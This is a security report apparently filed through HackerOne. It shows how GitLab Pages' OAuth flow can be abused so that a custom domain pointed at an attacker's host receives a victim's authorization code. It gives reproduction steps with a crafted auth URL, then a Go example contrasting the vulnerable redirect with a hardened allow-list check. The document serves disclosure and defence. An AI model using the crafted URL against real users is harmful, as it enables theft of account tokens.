Oauth2 and Gitlab-Page problem
HackerOne report #1035398 by ledz1996 on 2020-11-16, assigned to @dcouture:
Report
Summary
There is a problem with the current GitLab Pages and GitLab:
- Stealing the OAuth2 token from GitLab Pages
For the first problem, it is very simple to add an A record pointing your custom domain to your designated host. You just have to do the verification step to get it done.
A subsequent request to the following URL will return an OAuth2 token for the designated domain:
https://projects.gitlab.io/auth?domain=http://test123.testforgitlab.xyz&state=DePkz40iQTvpMnc_WvgsdA==
Steps to reproduce
1. Create a project and a .gitlab-ci.yml to use GitLab Pages:

### This file is a template, and might need editing before it works on your project.
### Full project: https://gitlab.com/pages/plain-html
pages:
  stage: deploy
  script:
    - mkdir .public
    - echo "1234" > .public/hehe.html
    - cp -r * .public
    - mv .public public
  artifacts:
    paths:
      - public
  only:
    - master

2. Configure a custom domain for Pages and do the verification step, but instead of adding a CNAME to <user>.gitlab.io, change it to your address with an A record. I used test123.testforgitlab.xyz as my custom domain.
3. Log in as another user and navigate to the following URL:
https://projects.gitlab.io/auth?domain=http://test123.testforgitlab.xyz&state=DePkz40iQTvpMnc_WvgsdA==
4. Without the user's consent, a request is later sent to http://test123.testforgitlab.xyz with the OAuth2 code; this code is exactly the same as the code for authorizing GitLab Pages, as seen in Burp. This is the main issue.
Mitigations
For the first problem, I think you should separate the tokens for OAuth2 GitLab and OAuth2 GitLab Pages. For example, the OAuth2 token generated for projects.gitlab.io should be different from the one for the user's GitLab Pages.
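The redirect step described in the reproduction (the Pages auth endpoint forwarding the authorization code to whatever origin was passed in the `domain` parameter) and the mitigation question above are both illustrated by the following Go model. It is an added example written for this page, not code from gitlab-pages, and it takes a different route from the reporter's suggestion of separate tokens: the vulnerable function forwards the code to any parsed origin, while the hardened function only forwards it to an https origin whose host is actually served by this Pages instance, so a verified custom domain whose A record points at an attacker's host never receives the code. The `servedDomains` set, the function names and the error values are assumptions made for the example; the real service's domain lookup, session-bound `state` validation and fix are not reproduced here.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
	"strings"
)

// Errors returned by the hardened variant (names chosen for this example).
var (
	ErrInsecureScheme = errors.New("redirect target must use https")
	ErrUnknownDomain  = errors.New("domain is not served by this Pages instance")
	ErrMalformedURL   = errors.New("domain parameter is not a bare origin")
)

// servedDomains is constructed sample data standing in for the set of hosts
// this Pages server actually answers for. The attacker's custom domain from
// the report is deliberately absent: its A record points at the attacker's
// own host, not at Pages, so Pages should never hand it a code.
var servedDomains = map[string]bool{
	"projects.gitlab.io": true,
	"user.gitlab.io":     true,
}

// VulnerableCodeRedirect models the behaviour the report describes: whatever
// origin arrives in the domain query parameter is trusted as the landing host
// for the authorization code. An attacker-controlled origin captures the code.
func VulnerableCodeRedirect(domain, code, state string) (string, error) {
	u, err := url.Parse(domain)
	if err != nil {
		return "", err
	}
	u.Path = "/auth"
	q := url.Values{}
	q.Set("code", code)
	q.Set("state", state)
	u.RawQuery = q.Encode()
	return u.String(), nil
}

// HardenedCodeRedirect is an illustrative check, not the project's own fix:
// the code is only forwarded to a bare https origin whose host is in the set
// of domains this Pages instance serves.
func HardenedCodeRedirect(domain, code, state string, served map[string]bool) (string, error) {
	u, err := url.Parse(domain)
	if err != nil {
		return "", err
	}
	// Only a bare origin is acceptable: no userinfo, path, query or fragment
	// that could smuggle a different host or change the landing page.
	if u.Opaque != "" || u.User != nil || (u.Path != "" && u.Path != "/") ||
		u.RawQuery != "" || u.Fragment != "" {
		return "", ErrMalformedURL
	}
	if u.Scheme != "https" {
		return "", ErrInsecureScheme
	}
	if !served[strings.ToLower(u.Hostname())] {
		return "", ErrUnknownDomain
	}
	// Rebuild the target from scratch rather than reusing the parsed URL.
	target := url.URL{Scheme: "https", Host: u.Host, Path: "/auth"}
	q := url.Values{}
	q.Set("code", code)
	q.Set("state", state)
	target.RawQuery = q.Encode()
	return target.String(), nil
}

func main() {
	attacker := "http://test123.testforgitlab.xyz" // custom domain from the report
	leaked, _ := VulnerableCodeRedirect(attacker, "code-from-gitlab", "s1")
	fmt.Println("vulnerable forwards to:", leaked)
	for _, d := range []string{attacker, "https://test123.testforgitlab.xyz", "https://user.gitlab.io"} {
		out, err := HardenedCodeRedirect(d, "code-from-gitlab", "s1", servedDomains)
		fmt.Printf("hardened %s -> %q (err: %v)\n", d, out, err)
	}
}
```

Running it shows the vulnerable path emitting `http://test123.testforgitlab.xyz/auth?code=...`, while the hardened path rejects the report's http origin on scheme, rejects the https form of the attacker's domain as unserved, and only produces a redirect for a host in `servedDomains`. The host allow-list is the key control: domain verification proves the attacker owns the name, not that the name resolves to Pages.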
Impact
Leakage of tokens, misleading authorization message.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: